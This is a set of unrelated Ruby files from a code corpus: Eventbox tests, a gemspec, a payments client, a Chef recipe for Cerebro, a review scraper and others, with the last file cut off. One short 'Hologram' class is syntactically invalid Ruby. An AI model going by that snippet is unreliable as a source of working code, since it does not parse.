return obj, obj.class, obj[0].class
end
end.new
obj = [eb.shared_object(["string"])]
res, kl1, kl2 = eb.go(obj)
assert_equal Array, kl1
assert_equal Eventbox::ExternalObject, kl2
assert_same obj[0], res[0]
assert_equal Array, res.class
assert_equal Array, res[0].class
assert_equal "string", res[0][0]
end
def test_untaggable_object_extern
eb = Class.new(Eventbox) do
end.new
err = assert_raises(Eventbox::InvalidAccess) { eb.shared_object("mutable".freeze) }
assert_match(/not taggable/, err.to_s)
err = assert_raises(Eventbox::InvalidAccess) { eb.shared_object(123) }
assert_match(/not taggable/, err.to_s)
end
def test_internal_object_invalid_access
fc = Class.new(Eventbox) do
sync_call def pr
IO.pipe
end
end.new
ios = fc.pr
assert_equal Array, ios.class
io = ios.first
assert_equal Eventbox::WrappedObject, io.class
ex = assert_raises(NoMethodError){ ios.first.close }
assert_match(/`close'/, ex.to_s)
end
class TestObject
def initialize(a, b, c)
@a = a
@b = b
@c = c
end
attr_reader :a
attr_reader :b
attr_reader :c
end
def test_dissect_instance_variables
eb = Class.new(Eventbox) do
sync_call def go(obj)
[obj.class, obj.a.class, obj.b.class, obj.c.class]
end
end.new
obj = TestObject.new("abc", proc{}, IO.pipe.first)
okl, akl, bkl, ckl = eb.go(obj)
assert_equal TestObject, okl
assert_equal String, akl
assert_equal Eventbox::ExternalProc, bkl
assert_equal Eventbox::ExternalObject, ckl
assert_equal TestObject, obj.class
assert_equal String, obj.a.class
assert_equal Proc, obj.b.class
assert_equal IO, obj.c.class
end
class TestStruct < Struct.new(:a, :b, :c)
attr_accessor :x
end
def test_dissect_struct_members
eb = Class.new(Eventbox) do
sync_call def go(obj)
[obj.class, obj.a.class, obj.b.class, obj.c.class, obj.x.class]
end
end.new
obj = TestStruct.new("abc", proc{}, IO.pipe.first)
obj.x = "uvw"
okl, akl, bkl, ckl, xkl = eb.go(obj)
assert_equal TestStruct, okl
assert_equal String, akl
assert_equal Eventbox::ExternalProc, bkl
assert_equal Eventbox::ExternalObject, ckl
assert_equal String, xkl
assert_equal TestStruct, obj.class
assert_equal String, obj.a.class
assert_equal Proc, obj.b.class
assert_equal IO, obj.c.class
assert_equal String, obj.x.class
end
class TestArray < Array
attr_accessor :x
end
def test_dissect_array_values
eb = Class.new(Eventbox) do
sync_call def go(obj)
[obj.class, obj[0].class, obj[1].class, obj[2].class, obj.x.class]
end
end.new
obj = TestArray["abc", proc{}, IO.pipe.first]
obj.x = "uvw"
okl, akl, bkl, ckl, xkl = eb.go(obj)
assert_equal TestArray, okl
assert_equal String, akl
assert_equal Eventbox::ExternalProc, bkl
assert_equal Eventbox::ExternalObject, ckl
assert_equal String, xkl
assert_equal TestArray, obj.class
assert_equal String, obj[0].class
assert_equal Proc, obj[1].class
assert_equal IO, obj[2].class
assert_equal String, obj.x.class
end
class TestHash < Hash
attr_accessor :x
end
def test_dissect_hash_values
eb = Class.new(Eventbox) do
sync_call def go(obj)
[obj.class, obj[:a].class, obj[:b].class, obj[:c].class, obj.x.class]
end
end.new
obj = TestHash[a: "abc", b: proc{}, c: IO.pipe.first]
obj.x = "uvw"
okl, akl, bkl, ckl, xkl = eb.go(obj)
assert_equal TestHash, okl
assert_equal String, akl
assert_equal Eventbox::ExternalProc, bkl
assert_equal Eventbox::ExternalObject, ckl
assert_equal String, xkl
assert_equal TestHash, obj.class
assert_equal String, obj[:a].class
assert_equal Proc, obj[:b].class
assert_equal IO, obj[:c].class
assert_equal String, obj.x.class
end
def test_dissect_struct_members_fails
eb = Class.new(Eventbox) do
sync_call def go(obj)
[obj.class, obj]
end
end.new
okl, obj = eb.go(Struct.new(:a).new("abc"))
assert_equal Eventbox::ExternalObject, okl
assert_equal "abc", obj.a
end
class UnmarshalableTestObject < IO
def initialize(a)
super(0)
@a = a
end
attr_reader :a
end
def test_dissect_instance_variables_fails
eb = Class.new(Eventbox) do
sync_call def go(obj)
[obj.class, obj]
end
end.new
okl, obj = eb.go(UnmarshalableTestObject.new("abc"))
assert_equal Eventbox::ExternalObject, okl
assert_equal "abc", obj.a
end
class UnmarshalableArray < Array
def initialize(a)
super()
@a = a
end
attr_reader :a
def _dump(v)
raise TypeError
end
end
def test_dissect_array_values_fails
eb = Class.new(Eventbox) do
sync_call def go(obj)
[obj.class, obj]
end
end.new
okl, obj = eb.go(UnmarshalableArray.new("abc") << "cde")
assert_equal Eventbox::ExternalObject, okl
assert_equal "abc", obj.a
assert_equal ["cde"], obj.to_a
end
def test_dissect_hash_values_fails
eb = Class.new(Eventbox) do
sync_call def go(obj)
[obj.class, obj]
end
end.new
okl, obj = eb.go({IO.pipe.first => "abc"})
assert_equal Eventbox::ExternalObject, okl
assert_equal ["abc"], obj.values
end
end
| 25.317647 | 87 | 0.656289 |
bf7cbef552c07778de54d7db97673a655b53f73b | 483 | # frozen_string_literal: true
# Copyright The OpenTelemetry Authors
#
# SPDX-License-Identifier: Apache-2.0
require 'redis'
require 'opentelemetry/sdk'
require 'minitest/autorun'
require 'fakeredis/minitest'
# Global OpenTelemetry SDK setup for the test suite: every finished span is
# handed synchronously (SimpleSpanProcessor) to an in-memory exporter so
# individual tests can inspect the recorded spans via EXPORTER.
EXPORTER = OpenTelemetry::SDK::Trace::Export::InMemorySpanExporter.new
span_processor = OpenTelemetry::SDK::Trace::Export::SimpleSpanProcessor.new(EXPORTER)
OpenTelemetry::SDK.configure do |c|
  c.add_span_processor span_processor
end
| 23 | 85 | 0.801242 |
ff66a09eab932c4c39c48d86edce646a6cf4156f | 3,480 | # frozen_string_literal: true
module MasterfilesApp
  # Interactor encapsulating create/update/delete workflows for contract
  # workers and the linking of personnel identifiers to them. All database
  # work runs inside repository transactions with status/transaction logging.
  class ContractWorkerInteractor < BaseInteractor
    # Validates and persists a new contract worker, logging the creation.
    # Returns a success response with the created record, or a
    # validation/failure response.
    def create_contract_worker(params) # rubocop:disable Metrics/AbcSize
      res = validate_contract_worker_params(params)
      return validation_failed_response(res) if res.failure?
      id = nil
      repo.transaction do
        id = repo.create_contract_worker(res)
        log_status(:contract_workers, id, 'CREATED')
        log_transaction
      end
      instance = contract_worker(id)
      success_response("Created contract worker #{instance.first_name}", instance)
    rescue Sequel::UniqueConstraintViolation
      # Duplicate key: surface it as a validation error on first_name.
      validation_failed_response(OpenStruct.new(messages: { first_name: ['This contract worker already exists'] }))
    rescue Crossbeams::InfoError => e
      failed_response(e.message)
    end

    # Validates and applies an update to an existing contract worker.
    def update_contract_worker(id, params)
      res = validate_contract_worker_params(params)
      return validation_failed_response(res) if res.failure?
      repo.transaction do
        repo.update_contract_worker(id, res)
        log_transaction
      end
      instance = contract_worker(id)
      success_response("Updated contract worker #{instance.first_name}", instance)
    rescue Crossbeams::InfoError => e
      failed_response(e.message)
    end

    # Deletes a contract worker, logging the deletion. The name is read
    # before deletion so it can be reported back.
    def delete_contract_worker(id)
      name = contract_worker(id).first_name
      repo.transaction do
        repo.delete_contract_worker(id)
        log_status(:contract_workers, id, 'DELETED')
        log_transaction
      end
      success_response("Deleted contract worker #{name}")
    rescue Crossbeams::InfoError => e
      failed_response(e.message)
    end

    # Raises TaskNotPermittedError unless the task is allowed for the worker.
    def assert_permission!(task, id = nil)
      res = TaskPermissionCheck::ContractWorker.call(task, id)
      raise Crossbeams::TaskNotPermittedError, res.message unless res.success
    end

    # Raises TaskNotPermittedError unless the task is allowed for the
    # personnel identifier.
    def assert_personnel_identifier_permission!(task, id = nil)
      res = TaskPermissionCheck::PersonnelIdentifier.call(task, id)
      raise Crossbeams::TaskNotPermittedError, res.message unless res.success
    end

    # Unlinks an identifier from whichever worker currently holds it and
    # marks the identifier as no longer in use.
    def de_link_personnel_identifier(id)
      contract_worker_id = repo.find_contract_worker_id_by_identifier_id(id)
      repo.transaction do
        repo.update_contract_worker(contract_worker_id, personnel_identifier_id: nil)
        repo.update(:personnel_identifiers, id, in_use: false)
        # log status?
      end
      success_response('Successfully de-linked identifier from worker', in_use: false, contract_worker: nil)
    end

    # Validates and links an identifier to a worker, marking it in use.
    def link_to_personnel_identifier(id, params) # rubocop:disable Metrics/AbcSize
      res = validate_contract_worker_link_params(params.merge(id: id))
      return validation_failed_response(res) if res.failure?
      repo.transaction do
        repo.update_contract_worker(params[:contract_worker_id], personnel_identifier_id: id)
        repo.update(:personnel_identifiers, id, in_use: true)
        # log status?
      end
      success_response('Successfully linked identifier to worker', in_use: true, contract_worker: contract_worker(params[:contract_worker_id])[:contract_worker_name])
    end

    private

    # Memoized repository instance used for all data access.
    def repo
      @repo ||= HumanResourcesRepo.new
    end

    # Looks up a contract worker record by id.
    def contract_worker(id)
      repo.find_contract_worker(id)
    end

    # Schema validation for create/update params.
    def validate_contract_worker_params(params)
      ContractWorkerSchema.call(params)
    end

    # Schema validation for identifier-link params.
    def validate_contract_worker_link_params(params)
      ContractWorkerLinkSchema.call(params)
    end
  end
end
| 33.786408 | 166 | 0.724138 |
5dd48ec66f6e49e54827e71aca7c3a999a7299ff | 7,186 | # -*- encoding: utf-8 -*-
# stub: github-pages 168 ruby lib
# Dependency stub for the github-pages gem: pins the exact Jekyll stack
# that GitHub Pages runs so local builds match production.
Gem::Specification.new do |s|
  s.name = "github-pages".freeze
  s.version = "168"

  s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
  s.require_paths = ["lib".freeze]
  s.authors = ["GitHub, Inc.".freeze]
  s.date = "2017-11-06"
  s.description = "Bootstrap the GitHub Pages Jekyll environment locally.".freeze
  s.email = "[email protected]".freeze
  s.executables = ["github-pages".freeze]
  s.files = ["bin/github-pages".freeze]
  s.homepage = "https://github.com/github/pages-gem".freeze
  s.licenses = ["MIT".freeze]
  s.required_ruby_version = Gem::Requirement.new(">= 2.0.0".freeze)
  s.rubygems_version = "3.1.2".freeze
  s.summary = "Track GitHub Pages dependencies.".freeze

  s.installed_by_version = "3.1.2" if s.respond_to? :installed_by_version

  s.specification_version = 4 if s.respond_to? :specification_version

  # [name, requirement, runtime?] for every pinned dependency, in the order
  # the generated stub declared them (runtime deps first, then dev deps).
  dependencies = [
    ["jekyll", "= 3.6.2", true],
    ["jekyll-sass-converter", "= 1.5.0", true],
    ["kramdown", "= 1.14.0", true],
    ["liquid", "= 4.0.0", true],
    ["rouge", "= 2.2.1", true],
    ["github-pages-health-check", "= 1.3.5", true],
    ["jekyll-redirect-from", "= 0.12.1", true],
    ["jekyll-sitemap", "= 1.1.1", true],
    ["jekyll-feed", "= 0.9.2", true],
    ["jekyll-gist", "= 1.4.1", true],
    ["jekyll-paginate", "= 1.1.0", true],
    ["jekyll-coffeescript", "= 1.0.2", true],
    ["jekyll-seo-tag", "= 2.3.0", true],
    ["jekyll-github-metadata", "= 2.9.3", true],
    ["jekyll-avatar", "= 0.5.0", true],
    ["jemoji", "= 0.8.1", true],
    ["jekyll-mentions", "= 1.2.0", true],
    ["jekyll-relative-links", "= 0.5.1", true],
    ["jekyll-optional-front-matter", "= 0.2.0", true],
    ["jekyll-readme-index", "= 0.1.0", true],
    ["jekyll-default-layout", "= 0.1.4", true],
    ["jekyll-titles-from-headings", "= 0.4.0", true],
    ["listen", "= 3.0.6", true],
    ["activesupport", "= 4.2.9", true],
    ["minima", "= 2.1.1", true],
    ["jekyll-swiss", "= 0.4.0", true],
    ["jekyll-theme-primer", "= 0.5.2", true],
    ["jekyll-theme-architect", "= 0.1.0", true],
    ["jekyll-theme-cayman", "= 0.1.0", true],
    ["jekyll-theme-dinky", "= 0.1.0", true],
    ["jekyll-theme-hacker", "= 0.1.0", true],
    ["jekyll-theme-leap-day", "= 0.1.0", true],
    ["jekyll-theme-merlot", "= 0.1.0", true],
    ["jekyll-theme-midnight", "= 0.1.0", true],
    ["jekyll-theme-minimal", "= 0.1.0", true],
    ["jekyll-theme-modernist", "= 0.1.0", true],
    ["jekyll-theme-slate", "= 0.1.0", true],
    ["jekyll-theme-tactile", "= 0.1.0", true],
    ["jekyll-theme-time-machine", "= 0.1.0", true],
    ["mercenary", "~> 0.3", true],
    ["terminal-table", "~> 1.4", true],
    ["rspec", "~> 3.3", false],
    ["rainbow", "~> 2.1.0", false],
    ["pry", "~> 0.10", false],
    ["jekyll_test_plugin_malicious", "~> 0.2", false],
    ["rubocop", "~> 0.4", false],
  ]

  # Older rubygems lacks add_runtime_dependency; fall back to add_dependency.
  modern_rubygems = s.respond_to? :add_runtime_dependency
  dependencies.each do |name, requirement, runtime|
    if modern_rubygems
      if runtime
        s.add_runtime_dependency(name.freeze, [requirement])
      else
        s.add_development_dependency(name.freeze, [requirement])
      end
    else
      s.add_dependency(name.freeze, [requirement])
    end
  end
end
| 57.951613 | 112 | 0.659059 |
1a445c8eda435a1e7fb371d35bf5d9008ecd6013 | 747 | require_relative "service"
module Adyen
  # Thin wrapper around the Adyen "Payment" API service. All heavy lifting
  # (request building and dispatch) happens in the Service base class; this
  # subclass only declares which payment operations exist and which of them
  # must carry applicationInfo data.
  class Payments < Service
    attr_accessor :version

    # Payment API version used unless the caller supplies another one.
    DEFAULT_VERSION = 64

    # @param client  [Object]  transport client handed through to Service
    # @param version [Integer] Payment API version (defaults to DEFAULT_VERSION)
    def initialize(client, version = DEFAULT_VERSION)
      supported_operations = %i[
        authorise
        authorise3d
        authorise3ds2
        capture
        cancel
        refund
        cancel_or_refund
        adjust_authorisation
        donate
        get_authentication_result
        technical_cancel
        void_pending_refund
        retrieve_3ds2_result
      ]
      # Operations that must include applicationInfo in their request body.
      operations_with_app_info = %i[authorise authorise3d authorise3ds2]
      super(client, version, 'Payment', supported_operations, operations_with_app_info)
    end
  end
end
| 21.342857 | 74 | 0.606426 |
1aea59cf2fe26b16b9d63c1873796346b949f195 | 289 | ## Adds Star Wars like holograms to site.
# Adds Star Wars like holograms to the site.
#
# The original source did not parse: `Class hologram` (capital-C keyword and a
# lowercase class name) and a stray leading colon on `:attr_accessor` are both
# syntax errors. Rewritten as a conventional class definition.
class Hologram
  attr_accessor :type, :gender

  # @param type   [Object] kind of hologram to project
  # @param gender [Object] gender presented by the hologram
  def initialize(type, gender)
    @type = type
    @gender = gender
  end

  # Renders the hologram image via the `live_image` helper.
  # NOTE(review): `live_image` is not defined in this file — assumed to be
  # provided by the including context; confirm before relying on it.
  def render_image(img)
    live_image(img)
  end
end
7a96058789250b51e47bad543ff3cc0b67882bb6 | 6,684 | # Cookbook Name:: cerebro
include_recipe 'java::default' # Note this must exist for elasticsearch
# set vars
install_dir = node['cerebro']['install_dir']
fqdn_hostname = node['cerebro']['fqdn_hostname']
short_hostname = node['cerebro']['short_hostname']
machinename = node['cerebro']['machinename']
app_port = node['cerebro']['app_port']
app_name = node['cerebro']['app_name']
app_user = node['cerebro']['app_user']
app_group = node['cerebro']['app_group']
app_bin_path = node['cerebro']['app_bin_path']
app_workdir = node['cerebro']['app_workdir']
dist_url = node['cerebro']['dist_url']
dist_package = node['cerebro']['dist_package']
dist_checksum = node['cerebro']['dist_checksum']
app_version = node['cerebro']['app_version']
config_dir = node['cerebro']['config_dir']
app_systemd_desc = node['cerebro']['app_systemd_desc']
standard_output = node['cerebro']['standard_output']
standard_error = node['cerebro']['standard_error']
timeout_stop_sec = node['cerebro']['timeout_stop_sec']
kill_signal = node['cerebro']['kill_signal']
send_sig_kill = node['cerebro']['send_sig_kill']
success_exit_status = node['cerebro']['success_exit_status']
app_secret_key = node['cerebro']['app_secret_key']
truststore_file = node['cerebro']['truststore_file']
truststore_path = node['cerebro']['truststore_path']
s3_bucket_remote_path = node['td_elasticsearch']['s3_bucket_remote_path']
# databag 'sigh' needed for kitchen and non chef provisioned (with role, etc.) this is just RO chef user
aws = data_bag_item('aws', 'main')
aws_access_key = aws['aws_access_key_id']
aws_secret_access_key = aws['aws_secret_access_key']
Chef::Log.info("for non-EC2 instances we will use RO chef users aws_access_key: #{aws_access_key} and its aws_secret_access_key")
Chef::Log.info("DEBUG fqdn_hostname: #{fqdn_hostname}")
package %w(httpd mod_ssl)
template '/etc/httpd/conf.d/cerebro-service.conf' do
source 'cerebro.httpd.conf.erb'
notifies :restart, 'service[httpd]', :delayed
variables({
:fqdn_hostname => fqdn_hostname,
:short_hostname => short_hostname,
:machinename => machinename,
:app_port => app_port,
})
end
# shouldnt need this using RPM install JIC for reference JIC
# template '/etc/httpd/conf.modules.d/00-proxy.conf' do
# source '00-proxy.conf.erb'
# notifies :restart, 'service[httpd]', :delayed
# end
service 'httpd' do
action [ :enable, :start ]
subscribes :reload, 'template[/etc/httpd/conf.d/cerebro-service.conf]', :immediately
#subscribes :reload, 'template[/etc/httpd/conf.modules.d/00-proxy.conf]', :immediately
reload_command 'systemctl daemon-reload'
end
# fetch cerebro app dist
# i.e.: https://github.com/lmenezes/cerebro/releases/download/v0.7.2/cerebro-0.7.2.tgz
remote_file "/var/tmp/#{dist_package}" do
source dist_url
checksum dist_checksum
mode "0755"
action :create
end
directory install_dir do
owner app_user
group app_group
mode '0755'
action :create
end
# Unpack the Cerebro distribution tarball into the install dir. Guarded on
# the presence of the shipped application.conf so the unpack runs only once.
execute 'extract tar.gz file' do
  command "tar xzvf /var/tmp/#{dist_package}"
  cwd install_dir
  # File.exists? was long deprecated and removed entirely in Ruby 3.2;
  # File.exist? is the supported spelling.
  not_if { File.exist?("#{config_dir}/application.conf") }
end
# chef why write these backwards?
# linux command ln $target $source
# ln -s cerebro-0.7.2 current
link "#{install_dir}/current" do
to "#{install_dir}/#{app_name}-#{app_version}"
end
# find /opt/cerebro -type d
# /opt/cerebro
# /opt/cerebro/cerebro-0.7.2
# /opt/cerebro/cerebro-0.7.2/bin
# /opt/cerebro/cerebro-0.7.2/conf
# /opt/cerebro/cerebro-0.7.2/conf/evolutions
# /opt/cerebro/cerebro-0.7.2/conf/evolutions/default
# /opt/cerebro/cerebro-0.7.2/lib
# /opt/cerebro/cerebro-0.7.2/logs
# works but not recursively
# ref: https://github.com/chef/chef/issues/4468
#
# directory "#{install_dir}" do
# #%w[ /foo /foo/bar /foo/bar/baz ].each do |path| # hmm lots here
# #%w[ ].each do |path| # icky
# command lazy {
# "#{dir_list}".each do |path|
# owner "#{app_user}"
# group "#{app_group}"
# recursive true
# end
# }
# end
#
# sadly this is not idempotent the alternative is having to list every sub dir in the tree as noted above
# punting and sadly can live with this for now.
execute "chown-data-#{install_dir}" do
command "chown -R #{app_user}:#{app_group} #{install_dir}"
action :run
only_if "find #{install_dir} \! -user #{app_user}"
end
# Fetch the Java truststore used for TLS connections to Elasticsearch from S3,
# using the read-only data-bag credentials loaded above.
# NOTE(review): the interpolation wrappers around plain variables below
# ("#{aws_access_key}" etc.) are redundant when the values are already
# strings — safe to simplify once that is confirmed for these attributes.
aws_s3_file "#{truststore_path}/#{truststore_file}" do
  aws_access_key "#{aws_access_key}"
  aws_secret_access_key "#{aws_secret_access_key}"
  bucket 'terradatum-chef'
  region 'us-west-1'
  action :create
  remote_path "#{s3_bucket_remote_path}/#{truststore_file}"
  owner "#{app_user}"
  group "#{app_group}"
end
# Configure Systemd for cerebro
template "/etc/systemd/system/#{app_name}.service" do
source 'cerebro.service.erb'
#notifies :restart, "systemd_unit[#{app_name}.service]", :delayed
notifies :restart, "service[#{app_name}]", :delayed
variables({
:app_systemd_desc => app_systemd_desc,
:fqdn_hostname => fqdn_hostname,
:app_port => app_port,
:app_workdir => app_workdir,
:app_user => app_user,
:app_group => app_group,
:app_bin_path => app_bin_path,
:standard_output => standard_output,
:standard_error => standard_error,
:timeout_stop_sec => timeout_stop_sec,
:kill_signal => kill_signal,
:send_sig_kill => send_sig_kill,
:success_exit_status => success_exit_status
})
end
# if we need to we can mod app logging here
# template "#{config_dir}/logger.xml" do
# source "logger.xml.erb"
# variables({
# })
# end
# Create the application.conf file
template "#{config_dir}/application.conf" do
source 'cerebro.application.conf.erb'
owner "#{app_user}"
group "#{app_group}"
mode '0744'
#notifies :restart, "systemd_unit[#{app_name}.service]", :delayed
notifies :restart, "service[#{app_name}]", :immediately
variables({
:app_secret_key => app_secret_key
})
end
# as apache user req for term TLS/SSL and proxying for the play app--i.e., for cerebro we are sporting:
# java -Duser.dir=/opt/cerebro/cerebro-0.7.2 -Dhttp.port=9000 -Dhttp.address=kibana1.terradatum.com -cp -jar /opt/cerebro/cerebro-0.7.2/lib/cerebro.cerebro-0.7.2-launcher.jar
service "#{app_name}" do
supports :status => true, :restart => true
action [ :enable, :start ]
#subscribes :restart, "#{config_dir}/application.conf", :immediately
reload_command 'systemctl daemon-reload'
end
| 35.365079 | 175 | 0.681329 |
e27476c2b6a02dcd2501e59e376539a8fb278de8 | 106 | $LOAD_PATH.unshift File.expand_path('../../lib', __FILE__)
require 'easy_rss'
require 'minitest/autorun'
| 21.2 | 58 | 0.745283 |
181f7bb1e8681c4b31c43fd4e44dec8d4e9fab4c | 2,428 | require 'java'
java_import 'org.apollo.game.model.Animation'
java_import 'org.apollo.game.model.Graphic'
java_import 'org.apollo.game.model.entity.Skill'
ALCHEMY_SPELLS = {}
ILLEGAL_ALCH_ITEMS = [995, 6529, 6306, 6307, 6308, 6309, 6310]
# A spell that alchemises an item.
class AlchemySpell < Spell
  # Alchemy-specific presentation and payout attributes; level, elements and
  # experience are managed by the Spell base class.
  attr_reader :animation, :graphic, :multiplier, :experience

  # @param level      [Integer]   required Magic level (handled by Spell)
  # @param elements   [Hash]      rune requirements (handled by Spell)
  # @param experience [Numeric]   Magic experience granted per cast (handled by Spell)
  # @param animation  [Animation] played on the caster when the spell fires
  # @param graphic    [Graphic]   drawn on the caster when the spell fires
  # @param multiplier [Float]     fraction of the item's value paid out as gold
  def initialize(level, elements, experience, animation, graphic, multiplier)
    super(level, elements, experience)
    @animation = animation
    @graphic = graphic
    @multiplier = multiplier
  end
end
# An Action that performs an AlchemySpell.
class AlchemyAction < ItemSpellAction
  def initialize(player, alchemy, slot, item)
    super(player, alchemy, slot, item)
  end

  # True when the targeted item may not be alchemised (ids blacklisted in
  # ILLEGAL_ALCH_ITEMS).
  def illegal_item?
    ILLEGAL_ALCH_ITEMS.include?(@item.id)
  end

  # Two-phase pulse handler: pulse 0 plays the cast effects, converts the
  # item into gold and awards Magic experience; pulse 1 (after ALCHEMY_DELAY)
  # clears the effects and stops the action.
  # NOTE(review): the camelCase name presumably overrides a Java-side hook of
  # the Apollo engine — do not rename without checking the framework.
  def executeAction
    if @pulses == 0
      mob.play_animation(@spell.animation)
      mob.play_graphic(@spell.graphic)
      mob.send(DISPLAY_SPELLBOOK)
      inventory = mob.inventory
      # payout = item value * spell multiplier, plus 1 so it is never zero
      gold = (item.definition.value * @spell.multiplier) + 1
      inventory.remove(inventory.get(@slot).id, 1)
      # 995 is presumably the coins item id (it also appears in ILLEGAL_ALCH_ITEMS)
      inventory.add(995, gold)
      mob.skill_set.add_experience(Skill::MAGIC, @spell.experience)
      set_delay(ALCHEMY_DELAY)
    elsif @pulses == 1
      mob.stop_animation
      mob.stop_graphic
      stop
    end
  end
end
private
# The delay of an alchemy spell.
ALCHEMY_DELAY = 4
# The height of the graphic.
GRAPHIC_HEIGHT = 100
# Inserts an `AlchemySpell` into the hash of available alchemy spells.
# Registers an `AlchemySpell` in ALCHEMY_SPELLS, keyed by its interface
# button id.
#
# @param _name [Symbol] human-readable label; unused, kept for DSL readability
# @param hash  [Hash]   must contain :button, :level, :runes, :animation,
#                       :graphic, :multiplier and :experience
# @raise [RuntimeError] when a required key is missing
def alchemy(_name, hash)
  # NOTE(review): Hash#has_keys? is not core Ruby — assumed to be a project
  # extension; confirm it is loaded before this file.
  unless hash.has_keys?(:button, :level, :runes, :animation, :graphic, :multiplier, :experience)
    fail 'Hash must have button, level, runes, animation, graphic, multiplier, experience keys.'
  end
  id, multiplier = hash[:button], hash[:multiplier]
  level, runes, experience = hash[:level], hash[:runes], hash[:experience]
  animation = Animation.new(hash[:animation])
  graphic = Graphic.new(hash[:graphic], 0, GRAPHIC_HEIGHT)
  ALCHEMY_SPELLS[id] = AlchemySpell.new(level, runes, experience, animation, graphic, multiplier)
end
alchemy :low_level, button: 1_162, level: 21, runes: { FIRE => 3, NATURE => 1 }, animation: 712,
graphic: 112, multiplier: 0.48, experience: 31
alchemy :high_level, button: 1_178, level: 55, runes: { FIRE => 5, NATURE => 1 }, animation: 713,
graphic: 113, multiplier: 0.72, experience: 65
| 28.232558 | 97 | 0.700577 |
08fb92fe4228e058363a77602216af0b673896ef | 3,941 | require 'top_secret/version'
require 'rest-client'
require 'nokogiri'
require 'date'
require 'pry'
module TopSecret
  # Scrapes dealer review pages and returns the most positive reviews,
  # ordered by overall score and then recency. Uses RestClient for HTTP and
  # Nokogiri for HTML parsing.
  class Scrape
    # Collects reviews from `pages` consecutive result pages and returns the
    # top `limit_to_return` of them.
    # NOTE(review): the pagination below rewrites 'page<N-1>' into 'page<N>',
    # so the seed `url` is expected to contain the literal substring 'page0';
    # confirm with callers.
    def self.positive(url, pages, limit_to_return)
      reviews = []
      counter = 1
      # rewrites the url and calls extract on each page, starting with the first.
      while counter <= pages
        url = url.sub('page' + (counter - 1).to_s, 'page' + counter.to_s)
        reviews.concat extract(url)
        counter += 1
      end
      # sorts reviews based on the overall score and then the date.
      sort(reviews, limit_to_return)
    end

    # Sorts descending by overall rating, breaking ties by most recent review
    # date, then truncates to the requested count.
    def self.sort(reviews, limit_to_return)
      reviews = reviews.sort { |a, b| [b['overall'], Date.parse(b['date'])] <=> [a['overall'], Date.parse(a['date'])] }
      reviews.first(limit_to_return)
    end

    # Fetches one results page and parses every review on it into a Hash.
    def self.extract(url)
      reviews = []
      # convert the rest-client response into a nokogiri document; the
      # .review-entry css class identifies individual reviews.
      noko_page = Nokogiri::HTML(RestClient.get(url)).css('.review-entry')
      # build a hash for each review on the page
      noko_page.map do |user_review|
        review_to_add = {}
        # the date and overall score live in an earlier div than the rest of
        # the info found in the review-wrapper container
        add_date_overall(user_review, review_to_add)
        # the rest of the review
        review_wrapper = user_review.css('.review-wrapper').css('div')
        # title and name
        add_title_name(review_wrapper, review_to_add)
        # the main text of the review
        add_main_text(review_wrapper, review_to_add)
        # each category-specific score, resolved through `rating`
        add_specific_ratings(review_wrapper, review_to_add)
        # add employees
        add_employees(review_wrapper, review_to_add)
        reviews.push(review_to_add)
      end
      reviews
    end

    # Extracts the review date and the overall star rating.
    def self.add_date_overall(user_review, review_to_add)
      date_and_overall = user_review.css('.review-date').css('div')
      review_to_add['date'] = date_and_overall.css('.italic').text.strip
      review_to_add['overall'] = rating(date_and_overall.css('.dealership-rating').css('div')[1])
    end

    # Extracts the review title and the reviewer's display name.
    def self.add_title_name(review_wrapper, review_to_add)
      review_title = review_wrapper[1]
      review_to_add['title'] = review_title.css('h3').text.strip
      review_to_add['name'] = review_title.css('span').text.strip
    end

    # Extracts the free-text body of the review.
    def self.add_main_text(review_wrapper, review_to_add)
      review_body = review_wrapper[2]
      review_to_add['body'] = review_body.css('p').text.strip
    end

    # Extracts each labelled sub-rating, keyed by its on-page label text.
    def self.add_specific_ratings(review_wrapper, review_to_add)
      # the specific ratings
      review_ratings = review_wrapper.css('.review-ratings-all').css('.table').css('.tr')
      review_ratings.map do |specific_rating|
        specific_score = rating(specific_rating.css('div')[1])
        review_to_add[specific_rating.css('.bold').text] = specific_score
      end
    end

    # Extracts named employees plus any trailing "other employees" text.
    def self.add_employees(review_wrapper, review_to_add)
      # component containing employees
      review_employees = review_wrapper.css('.employees-wrapper')
      employees = []
      # loops through and stores each employee name
      review_employees.css('a').map do |employee|
        employees.push(employee.text.strip)
      end
      review_to_add['employees'] = employees
      # adds other employees if they exist
      if (other_employees = review_employees.css('span').css('.italic').text.strip) && !other_employees.empty?
        review_to_add['other_employees'] = other_employees
      end
      review_to_add
    end

    # Returns the rating either from the element's text or, when the text is
    # empty, from the first digit run embedded in the element's css class.
    def self.rating(element)
      return element.text.strip unless element.text.empty?
      rating_re = /\d+/
      rating_re.match(element.attr('class'))[0]
    end
  end
end
| 33.398305 | 140 | 0.676224 |
bb87cb5dd499e5620e04b13b5f8742396e816bd6 | 1,335 | =begin
#Ory APIs
#Documentation for all public and administrative Ory APIs. Administrative APIs can only be accessed with a valid Personal Access Token. Public APIs are mostly used in browsers.
The version of the OpenAPI document: v0.0.1-alpha.93
Contact: [email protected]
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 5.4.0
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for OryClient::SubmitSelfServiceRegistrationFlowBody
# Automatically generated by openapi-generator (https://openapi-generator.tech)
# Please update as you see appropriate
describe OryClient::SubmitSelfServiceRegistrationFlowBody do
describe '.openapi_one_of' do
it 'lists the items referenced in the oneOf array' do
expect(described_class.openapi_one_of).to_not be_empty
end
end
describe '.openapi_discriminator_name' do
it 'returns the value of the "discriminator" property' do
expect(described_class.openapi_discriminator_name).to_not be_empty
end
end
describe '.openapi_discriminator_mapping' do
it 'returns the key/values of the "mapping" property' do
expect(described_class.openapi_discriminator_mapping.values.sort).to eq(described_class.openapi_one_of.sort)
end
end
describe '.build' do
it 'returns the correct model' do
end
end
end
| 30.340909 | 177 | 0.776779 |
7af6d3a977dc11ba163398ad8328b0854dcf162f | 5,561 | #--------------------------------------------------------------------
# @file localexecutormapping.rb
# @author Johnny Willemsen
#
# @brief walker class for local executor mapping support
#
# @copyright Copyright (c) Remedy IT Expertise BV
#--------------------------------------------------------------------
require 'ridlbe/c++11/writerbase'
require 'ridlbe/c++11/writers/helpers/include_guard_helper'
module IDL
module CCMX11
# Shared base for LEM (Local Executor Mapping) IDL writers: points the
# template engine at the 'lem_idl' template tree and keeps scope tracking
# enabled so module nesting is followed during the walk.
class LemExecutorIDLWriterBase < Cxx11::CxxCodeWriterBase
  def initialize(output = STDOUT, opts = {})
    super
    self.template_root = 'lem_idl'
